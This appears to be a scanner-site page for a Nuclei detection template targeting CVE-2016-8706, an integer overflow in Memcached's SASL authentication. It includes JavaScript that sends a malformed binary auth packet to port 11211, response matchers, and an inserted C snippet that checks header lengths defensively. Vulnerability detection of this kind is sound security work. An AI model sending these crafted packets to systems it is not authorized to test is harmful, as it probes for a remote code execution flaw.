Memcached Server SASL Authentication - Remote Code Execution
ID: CVE-2016-8706
Severity: high
Author: pussycat0x
Tags: cve,cve2016,rce,js,memcached
Description
An integer overflow in the process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of the Memcached binary protocol, can be abused to cause a heap overflow and lead to remote code execution.
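A defensive check for the length handling this description concerns, as an added example (not Memcached's code and not part of the template): it decodes the 24-byte binary protocol request header and rejects a request whose key and extras lengths exceed its total body length before any value length is derived. The names `mc_parse_hdr` and `mc_check` and the sample headers are constructed here, and treating that length inconsistency as the condition relevant to this CVE is an assumption the page does not state.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Memcached binary protocol request header: 24 bytes, big-endian fields. */
#define MC_HDR_LEN   24
#define MC_MAGIC_REQ 0x80

typedef struct { uint8_t magic, opcode, extlen; uint16_t keylen; uint32_t bodylen; } mc_req_hdr;
enum mc_verdict { MC_OK = 0, MC_SHORT, MC_NOT_REQUEST, MC_BAD_LENGTHS };

/* Decode the fixed header; returns 0 on success, -1 if fewer than 24 bytes. */
int mc_parse_hdr(const uint8_t *buf, size_t len, mc_req_hdr *h) {
    if (buf == NULL || h == NULL || len < MC_HDR_LEN) return -1;
    h->magic   = buf[0];
    h->opcode  = buf[1];                       /* 0x21 = SASL auth */
    h->keylen  = (uint16_t)((buf[2] << 8) | buf[3]);
    h->extlen  = buf[4];
    h->bodylen = ((uint32_t)buf[8] << 24) | ((uint32_t)buf[9] << 16) |
                 ((uint32_t)buf[10] << 8) | (uint32_t)buf[11];
    return 0;
}

/* Total body = extras + key + value. Compare before subtracting, in a wide
 * unsigned type, so the derived value length can never wrap or go negative.
 * Assumption (not on the page): this inconsistency is the shape to reject. */
enum mc_verdict mc_check(const uint8_t *buf, size_t len, uint32_t *vlen) {
    mc_req_hdr h;
    if (mc_parse_hdr(buf, len, &h) != 0) return MC_SHORT;
    if (h.magic != MC_MAGIC_REQ) return MC_NOT_REQUEST;
    uint64_t fixed = (uint64_t)h.keylen + h.extlen;
    if (fixed > h.bodylen) return MC_BAD_LENGTHS;   /* body cannot hold key + extras */
    if (vlen) *vlen = (uint32_t)(h.bodylen - fixed);
    return MC_OK;
}

/* Constructed sample headers (not captured traffic); unlisted bytes are zero. */
const uint8_t MC_SAMPLE_GOOD[24] = {0x80, 0x21, 0x00, 0x05, 0, 0, 0, 0, 0, 0, 0, 0x0a};
const uint8_t MC_SAMPLE_BAD[24]  = {0x80, 0x21, 0x00, 0x20, 0, 0, 0, 0, 0, 0, 0, 0x01};

int main(void) {
    uint32_t v = 0;
    printf("good: verdict=%d\n", mc_check(MC_SAMPLE_GOOD, sizeof MC_SAMPLE_GOOD, &v));
    printf("bad:  verdict=%d\n", mc_check(MC_SAMPLE_BAD, sizeof MC_SAMPLE_BAD, &v));
    return 0;
}
```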
YAML Source
id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.89998
    epss-percentile: 0.98714
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 4a0a004730450220383bbb7799bd6d7c41a424f73403d72b74a250524bafced2284dc91f813cb1cc022100d293f668c8df2fc5299025d834ac92832487e05bd6d145b2368433e30d478a20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "javascript/cves/2016/CVE-2016-8706.yaml"